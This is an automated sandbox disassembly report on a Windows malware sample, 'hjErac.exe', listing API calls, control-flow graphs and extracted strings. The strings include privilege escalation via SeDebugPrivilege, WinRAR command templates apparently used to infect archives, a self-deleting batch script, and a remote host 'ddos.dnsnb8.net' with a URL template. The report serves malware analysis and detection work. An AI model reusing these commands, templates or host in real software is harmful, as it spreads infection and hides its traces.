                                                                              control_flow_graph 229 cb6076-cb6079 230 cb607b-cb6080 229->230 231 cb60e0-cb60eb 229->231 232 cb6082-cb6085 230->232 233 cb60f7-cb60f8 230->233 234 cb60ee-cb60f4 231->234 237 cb6087 232->237 238 cb60f6 232->238 235 cb60fa-cb60fc call cb66c8 233->235 236 cb60fe-cb6106 233->236 234->238 235->236 240 cb6108-cb611d 236->240 241 cb6155-cb6189 VirtualFree 236->241 237->234 242 cb6089-cb6095 237->242 238->233 243 cb611f-cb6121 240->243 247 cb618c-cb6192 241->247 244 cb60a1-cb60aa 242->244 245 cb6097-cb609f 242->245 248 cb6123 243->248 249 cb6151-cb6154 243->249 250 cb61ba-cb61c8 244->250 251 cb60b0-cb60c1 VirtualAlloc 244->251 245->244 252 cb6198-cb61b0 VirtualFree 247->252 253 cb60c7-cb60cf 247->253 248->249 256 cb6125-cb6128 248->256 249->241 254 cb61ca-cb61d7 250->254 255 cb6243-cb6251 250->255 251->253 252->250 259 cb61b2-cb61b4 252->259 253->247 263 cb60d5-cb60df VirtualAlloc 253->263 260 cb61dd-cb61e0 254->260 257 cb6253 255->257 258 cb6264-cb626f 255->258 261 cb612a-cb612e 256->261 262 cb6134-cb613b 256->262 264 cb6255-cb6258 257->264 265 cb6271-cb6276 258->265 259->250 260->255 266 cb61e2-cb61f2 260->266 261->262 273 cb6130-cb6132 261->273 262->273 274 cb613d-cb614f 262->274 263->231 264->258 269 cb625a-cb6262 264->269 270 cb6389-cb63b1 VirtualProtect 265->270 271 cb627c-cb6289 265->271 272 cb61f5-cb61fe 266->272 269->264 277 cb63b7-cb63ba 270->277 285 cb628b 271->285 286 cb6292-cb6298 271->286 275 cb620c-cb6219 272->275 276 cb6200-cb6203 272->276 273->243 274->243 281 cb6238-cb623f 275->281 279 cb621b-cb6228 276->279 280 cb6205-cb6208 276->280 282 cb63fc-cb63ff VirtualProtect 277->282 283 cb63bc-cb63c2 277->283 279->281 287 cb622a-cb6236 280->287 288 cb620a 280->288 281->272 290 cb6241 281->290 284 cb6400-cb6416 282->284 283->283 289 cb63c4 283->289 291 cb6418-cb641d 284->291 292 cb6420-cb6425 284->292 285->286 293 cb62a2-cb62ac 286->293 287->281 288->281 289->282 294 cb63c6-cb63cf 289->294 290->260 297 cb62ae 293->297 298 cb62b1-cb62c8 293->298 295 cb63d1 294->295 296 cb63d4-cb63d8 294->296 295->296 299 cb63da 296->299 300 cb63dd-cb63e1 296->300 297->298 301 cb62ce-cb62d4 298->301 302 cb6373-cb6384 298->302 299->300 305 cb63e3 300->305 306 cb63e7-cb63fa VirtualProtect 300->306 303 cb62da-cb62f1 301->303 304 cb62d6-cb62d9 301->304 302->265 308 cb62f3-cb62f9 303->308 309 cb6365-cb636e 303->309 304->303 305->306 306->277 306->282 310 cb62fb-cb630f 308->310 311 cb6314-cb6326 308->311 309->293 312 cb6426-cb649d 310->312 313 cb6328-cb634a 311->313 314 cb634c-cb6360 311->314 313->309 314->312
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,00001800,00001000,00000004), ref: 00CB60BE
                                                                              • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00CB60DF
                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00CB6189
                                                                              • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00CB61A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual$AllocFree
                                                                              • String ID:
                                                                              • API String ID: 2087232378-0
                                                                              • Opcode ID: 56459611dcc68a450d6fd4b353399d5498a836db7a1a46d7100ec6b83298af6f
                                                                              • Instruction ID: 43167344db7e1ecc35dcc5b2b29da78f960f78aaa8dd2a8e54e0d0902d975a3a
                                                                              • Opcode Fuzzy Hash: 56459611dcc68a450d6fd4b353399d5498a836db7a1a46d7100ec6b83298af6f
                                                                              • Instruction Fuzzy Hash: 2CD1C1B26006499FEB308F58CC85BEE77E5FF05311F144528ED9A8B281E778AA40CB65

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 332 cb2c48-cb2c75 memset call cb1973 335 cb2cb2-cb2cb9 332->335 336 cb2c77-cb2c7f 332->336 339 cb2cbb-cb2cc2 VirtualFree 335->339 340 cb2cc8-cb2ccc 335->340 337 cb2c8f-cb2cac CreateThread WaitForMultipleObjects 336->337 338 cb2c81-cb2c8b 336->338 337->335 338->337 339->340
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00CB2C57
                                                                                • Part of subcall function 00CB1973: PathFileExistsA.SHLWAPI(00CB4E5C,00000000,C:\Users\user\AppData\Local\Temp\hjErac.exe), ref: 00CB1992
                                                                                • Part of subcall function 00CB1973: CreateFileA.KERNEL32(00CB4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00CB19BA
                                                                                • Part of subcall function 00CB1973: Sleep.KERNEL32(00000064), ref: 00CB19C6
                                                                                • Part of subcall function 00CB1973: wsprintfA.USER32 ref: 00CB19EC
                                                                                • Part of subcall function 00CB1973: CopyFileA.KERNEL32(00CB4E5C,?,00000000), ref: 00CB1A00
                                                                                • Part of subcall function 00CB1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB1A1E
                                                                                • Part of subcall function 00CB1973: GetFileSize.KERNEL32(00CB4E5C,00000000), ref: 00CB1A2C
                                                                                • Part of subcall function 00CB1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00CB1A46
                                                                                • Part of subcall function 00CB1973: ReadFile.KERNEL32(00CB4E5C,00CB4E60,00000000,?,00000000), ref: 00CB1A65
                                                                              • CreateThread.KERNEL32(00000000,00000000,00CB2B8C,00000000,00000000,00000000), ref: 00CB2C99
                                                                              • WaitForMultipleObjects.KERNEL32(00000001,00CB16BA,00000001,000000FF,?,00CB16BA,00000000), ref: 00CB2CAC
                                                                              • VirtualFree.KERNEL32(00820000,00000000,00008000,C:\Users\user\AppData\Local\Temp\hjErac.exe,00CB4E5C,00CB4E60,?,00CB16BA,00000000), ref: 00CB2CC2
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\hjErac.exe, xrefs: 00CB2C69
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\hjErac.exe
                                                                              • API String ID: 2042498389-2769337085
                                                                              • Opcode ID: 8fba16d4d96812dfcd241f61955455eaa37df72cced495362e34a21345582bcc
                                                                              • Instruction ID: e286f546d37e1f3e5cb3dbeedade709b2170d965a7061a6da24d3a020d396ba6
                                                                              • Opcode Fuzzy Hash: 8fba16d4d96812dfcd241f61955455eaa37df72cced495362e34a21345582bcc
                                                                              • Instruction Fuzzy Hash: 13018F717452647BE714ABA5AC1AFEFBF6CEF01B60F104220F915D61C2D6A0DA00C7E0

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 341 cb14e1-cb14fb 342 cb14fd-cb1510 GetModuleHandleA 341->342 343 cb1541-cb1547 341->343 344 cb151a-cb1535 VirtualQuery 342->344 345 cb1512-cb1518 342->345 346 cb1549-cb154c 343->346 347 cb1573-cb1574 call cb1638 343->347 349 cb153b 344->349 350 cb1537-cb1539 344->350 345->343 351 cb1569-cb1570 346->351 352 cb154e-cb1555 346->352 353 cb1579-cb157a ExitProcess 347->353 349->343 350->343 350->349 352->351 354 cb1557-cb1566 call cb1af9 352->354 354->351
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 00CB1504
                                                                              • VirtualQuery.KERNEL32(00CB14E1,?,0000001C), ref: 00CB1525
                                                                              • ExitProcess.KERNEL32 ref: 00CB157A
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: ExitHandleModuleProcessQueryVirtual
                                                                              • String ID:
                                                                              • API String ID: 3946701194-0
                                                                              • Opcode ID: 99109afe691b68e3fd358dec28d3a0324f228724d2e0e2e44d350b708c0d4ecb
                                                                              • Instruction ID: 5e19c87be62d585aa1a9822ff27d2131199c3b4efb3361ebcd7ebf7b59764754
                                                                              • Opcode Fuzzy Hash: 99109afe691b68e3fd358dec28d3a0324f228724d2e0e2e44d350b708c0d4ecb
                                                                              • Instruction Fuzzy Hash: 38117C71A04214DFCB24EFB6E8A5BBE77BCEB94712F54422AFC12D3151D2308A45AB50

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 357 cb1915-cb1922 358 cb1928-cb192c 357->358 359 cb1924-cb1926 357->359 361 cb194f-cb1952 358->361 362 cb192e-cb194d memset GetFileTime 358->362 360 cb196e-cb1970 359->360 361->360 364 cb1954-cb1960 SetFileTime 361->364 363 cb1966-cb1968 362->363 365 cb196a 363->365 366 cb196c 363->366 364->363 365->366 366->360
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: FileTimememset
                                                                              • String ID:
                                                                              • API String ID: 176422537-0
                                                                              • Opcode ID: 9fceada4912258d22d292abe34c7ff31993fc58211858c741792306c08f4705d
                                                                              • Instruction ID: 8df195445f3ed297e96e7b2f1ac05957b057d153772636f5745ccf8d187c8069
                                                                              • Opcode Fuzzy Hash: 9fceada4912258d22d292abe34c7ff31993fc58211858c741792306c08f4705d
                                                                              • Instruction Fuzzy Hash: A9F06232600249ABDB30DE26DC14BEB7BACAF50361F54853AF926D10A0E730E745DBB0
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\hjErac.exe,?,?,?,?,?,?,00CB13EF), ref: 00CB11AB
                                                                              • OpenProcessToken.ADVAPI32(00000000,00000028,00CB13EF,?,?,?,?,?,?,00CB13EF), ref: 00CB11BB
                                                                              • AdjustTokenPrivileges.ADVAPI32(00CB13EF,00000000,?,00000010,00000000,00000000), ref: 00CB11EB
                                                                              • CloseHandle.KERNEL32(00CB13EF), ref: 00CB11FA
                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00CB13EF), ref: 00CB1203
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\hjErac.exe, xrefs: 00CB11A5
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\hjErac.exe
                                                                              • API String ID: 75692138-2769337085
                                                                              • Opcode ID: ad8345e82e6061d9e62352c3694d7d9db50f0ee64692ca9c4cee23737750cc2c
                                                                              • Instruction ID: 5f2a96d08cb7e2cbf7aeceff69ccdd233e5d0db6d2cd783600033e1bdb5888ed
                                                                              • Opcode Fuzzy Hash: ad8345e82e6061d9e62352c3694d7d9db50f0ee64692ca9c4cee23737750cc2c
                                                                              • Instruction Fuzzy Hash: 8B01E4B5900249EFDB00EFE4DD89BAEBBB8FF04305F504569E606A2250D7759F449B60
                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\hjErac.exe), ref: 00CB13BC
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00CB13DA
                                                                              • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00CB1448
                                                                                • Part of subcall function 00CB119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\hjErac.exe,?,?,?,?,?,?,00CB13EF), ref: 00CB11AB
                                                                                • Part of subcall function 00CB119F: OpenProcessToken.ADVAPI32(00000000,00000028,00CB13EF,?,?,?,?,?,?,00CB13EF), ref: 00CB11BB
                                                                                • Part of subcall function 00CB119F: AdjustTokenPrivileges.ADVAPI32(00CB13EF,00000000,?,00000010,00000000,00000000), ref: 00CB11EB
                                                                                • Part of subcall function 00CB119F: CloseHandle.KERNEL32(00CB13EF), ref: 00CB11FA
                                                                                • Part of subcall function 00CB119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00CB13EF), ref: 00CB1203
                                                                              Strings
                                                                              • C:\Users\user\AppData\Local\Temp\hjErac.exe, xrefs: 00CB13A8
                                                                              • SeDebugPrivilege, xrefs: 00CB13D3
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\hjErac.exe$SeDebugPrivilege
                                                                              • API String ID: 4123949106-3478962142
                                                                              • Opcode ID: 35d0a12d0f6649a38807665bf4a2e4f4f452057bf49e16b4814de8f6043e7219
                                                                              • Instruction ID: c04fffa931f249ed2c790b9f98a2654ce125f990cd450e301aa1785e027ed432
                                                                              • Opcode Fuzzy Hash: 35d0a12d0f6649a38807665bf4a2e4f4f452057bf49e16b4814de8f6043e7219
                                                                              • Instruction Fuzzy Hash: 73319271D40219EAEF20DBA6CC65FEFBBB8EB44704FA44169E914B2151E7309E49CF60

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 370 cb239d-cb23d6 strstr 371 cb23d8-cb23e2 370->371 372 cb2451-cb247a CreateFileA GetFileSize 370->372 373 cb23ed-cb23f1 371->373 374 cb2480-cb2483 372->374 375 cb2675-cb2676 CloseHandle 372->375 377 cb23f3-cb241d 373->377 378 cb23e4-cb23ec 373->378 374->375 379 cb2489-cb2493 374->379 376 cb267c-cb2681 RemoveDirectoryA 375->376 380 cb2687-cb268f 376->380 377->372 381 cb241f-cb2425 377->381 378->373 379->375 382 cb2499-cb254b call cb1915 CloseHandle memset strrchr wsprintfA strrchr memset * 2 wsprintfA Sleep call cb189d 379->382 383 cb243a-cb2443 381->383 384 cb2427-cb2436 381->384 382->376 391 cb2551-cb2556 382->391 383->380 387 cb2449 383->387 384->381 386 cb2438 384->386 386->372 387->372 391->376 392 cb255c-cb261c Sleep memset wsprintfA call cb29e2 memset wsprintfA Sleep call cb189d Sleep CreateFileA call cb1915 CloseHandle 391->392 392->376 399 cb261e-cb2626 392->399 399->376 400 cb2628-cb262c 399->400 401 cb262e-cb2632 400->401 402 cb2634-cb2640 400->402 403 cb2641-cb2665 SetFilePointer WriteFile 401->403 402->403 403->376 404 cb2667-cb2673 SetEndOfFile 403->404 404->376
                                                                              APIs
                                                                              • strstr.MSVCRT ref: 00CB23CC
                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CB2464
                                                                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00CB2472
                                                                              • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00CB24A8
                                                                              • memset.MSVCRT ref: 00CB24B9
                                                                              • strrchr.MSVCRT ref: 00CB24C9
                                                                              • wsprintfA.USER32 ref: 00CB24DE
                                                                              • strrchr.MSVCRT ref: 00CB24ED
                                                                              • memset.MSVCRT ref: 00CB24F2
                                                                              • memset.MSVCRT ref: 00CB2505
                                                                              • wsprintfA.USER32 ref: 00CB2524
                                                                              • Sleep.KERNEL32(000007D0), ref: 00CB2535
                                                                              • Sleep.KERNEL32(000007D0), ref: 00CB255D
                                                                              • memset.MSVCRT ref: 00CB256E
                                                                              • wsprintfA.USER32 ref: 00CB2585
                                                                              • memset.MSVCRT ref: 00CB25A6
                                                                              • wsprintfA.USER32 ref: 00CB25CA
                                                                              • Sleep.KERNEL32(000007D0), ref: 00CB25D0
                                                                              • Sleep.KERNEL32(000007D0,?,?), ref: 00CB25E5
                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00CB25FC
                                                                              • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00CB2611
                                                                              • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00CB2642
                                                                              • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00CB265B
                                                                              • SetEndOfFile.KERNEL32 ref: 00CB266D
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CB2676
                                                                              • RemoveDirectoryA.KERNEL32(?), ref: 00CB2681
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                                                                              • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2203340711-2169341206
                                                                              • Opcode ID: 3c04e264007e292eddb4a9a25359740c80037e1877e713aeebb9d45b0f0458b9
                                                                              • Instruction ID: 17a5c7eb35b7c56e681701be92882918f62830308ae8ab24ccfe00cc3a05682e
                                                                              • Opcode Fuzzy Hash: 3c04e264007e292eddb4a9a25359740c80037e1877e713aeebb9d45b0f0458b9
                                                                              • Instruction Fuzzy Hash: 078181B1508344ABD710AF64EC85FEF7BACEF88705F00061AFA94D21A1D774DA498B66
                                                                              APIs
                                                                              • memset.MSVCRT ref: 00CB2766
                                                                              • memset.MSVCRT ref: 00CB2774
                                                                              • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00CB2787
                                                                              • wsprintfA.USER32 ref: 00CB27AB
                                                                                • Part of subcall function 00CB185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00CB1118), ref: 00CB1867
                                                                                • Part of subcall function 00CB185B: srand.MSVCRT ref: 00CB1878
                                                                                • Part of subcall function 00CB185B: rand.MSVCRT ref: 00CB1880
                                                                                • Part of subcall function 00CB185B: srand.MSVCRT ref: 00CB1890
                                                                                • Part of subcall function 00CB185B: rand.MSVCRT ref: 00CB1894
                                                                              • wsprintfA.USER32 ref: 00CB27C6
                                                                              • CopyFileA.KERNEL32(?,00CB4C80,00000000), ref: 00CB27D4
                                                                              • wsprintfA.USER32 ref: 00CB27F4
                                                                                • Part of subcall function 00CB1973: PathFileExistsA.SHLWAPI(00CB4E5C,00000000,C:\Users\user\AppData\Local\Temp\hjErac.exe), ref: 00CB1992
                                                                                • Part of subcall function 00CB1973: CreateFileA.KERNEL32(00CB4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00CB19BA
                                                                                • Part of subcall function 00CB1973: Sleep.KERNEL32(00000064), ref: 00CB19C6
                                                                                • Part of subcall function 00CB1973: wsprintfA.USER32 ref: 00CB19EC
                                                                                • Part of subcall function 00CB1973: CopyFileA.KERNEL32(00CB4E5C,?,00000000), ref: 00CB1A00
                                                                                • Part of subcall function 00CB1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CB1A1E
                                                                                • Part of subcall function 00CB1973: GetFileSize.KERNEL32(00CB4E5C,00000000), ref: 00CB1A2C
                                                                                • Part of subcall function 00CB1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00CB1A46
                                                                                • Part of subcall function 00CB1973: ReadFile.KERNEL32(00CB4E5C,00CB4E60,00000000,?,00000000), ref: 00CB1A65
                                                                              • DeleteFileA.KERNEL32(?,?,00CB4E54,00CB4E58), ref: 00CB281A
                                                                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00CB4E54,00CB4E58), ref: 00CB2832
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                                                                              • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                                                                              • API String ID: 692489704-3961832207
                                                                              • Opcode ID: 7fde94a63b27b1792e888e041419aa9d734835d767999524a6f0241b49894c13
                                                                              • Instruction ID: 2f717a8f307bf0045728eed8d048228fca8a3e9e3fa9c8d4ad211fd2e8faeae8
                                                                              • Opcode Fuzzy Hash: 7fde94a63b27b1792e888e041419aa9d734835d767999524a6f0241b49894c13
                                                                              • Instruction Fuzzy Hash: CA2151B6D4026C7BEB10EBA4AC89FEB776CEB14744F4005B1B654E2042E670EF448AA1
                                                                              APIs
                                                                                • Part of subcall function 00CB185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00CB1118), ref: 00CB1867
                                                                                • Part of subcall function 00CB185B: srand.MSVCRT ref: 00CB1878
                                                                                • Part of subcall function 00CB185B: rand.MSVCRT ref: 00CB1880
                                                                                • Part of subcall function 00CB185B: srand.MSVCRT ref: 00CB1890
                                                                                • Part of subcall function 00CB185B: rand.MSVCRT ref: 00CB1894
                                                                              • wsprintfA.USER32 ref: 00CB15AA
                                                                              • wsprintfA.USER32 ref: 00CB15C6
                                                                              • lstrlen.KERNEL32(?), ref: 00CB15D2
                                                                              • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00CB15EE
                                                                              • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00CB1609
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00CB1612
                                                                              • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00CB162D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true
                                                                              • Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd
                                                                              Similarity
                                                                              • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                                                                              • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\hjErac.exe$open
                                                                              • API String ID: 617340118-2706779844
                                                                              • Opcode ID: ed3c7719802302263b30dcf99a0435af2f22e9f7e76217281bc42f577e6a185c
                                                                              • Instruction ID: 9bb05b38029783a06de1c31e4450c1a6fd82a64a554281e131b2a6b5d370652b
                                                                              • Opcode Fuzzy Hash: ed3c7719802302263b30dcf99a0435af2f22e9f7e76217281bc42f577e6a185c
                                                                              • Instruction Fuzzy Hash: A7115172A411687AD72097A8AC89FEF7B7CDF59750F000161F959E3051EA70AF848BB0
                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00CB1400), ref: 00CB1226
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00CB122D
                                                                              • GetCurrentProcessId.KERNEL32(?,?,?,?,00CB1400), ref: 00CB123F
                                                                              • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00CB1400), ref: 00CB1250
                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\hjErac.exe,?,?,?,?,00CB1400), ref: 00CB129E
                                                                              • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\hjErac.exe,?,?,?,?,00CB1400), ref: 00CB12B0
                                                                              • CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\hjErac.exe,?,?,?,?,00CB1400), ref: 00CB12F5
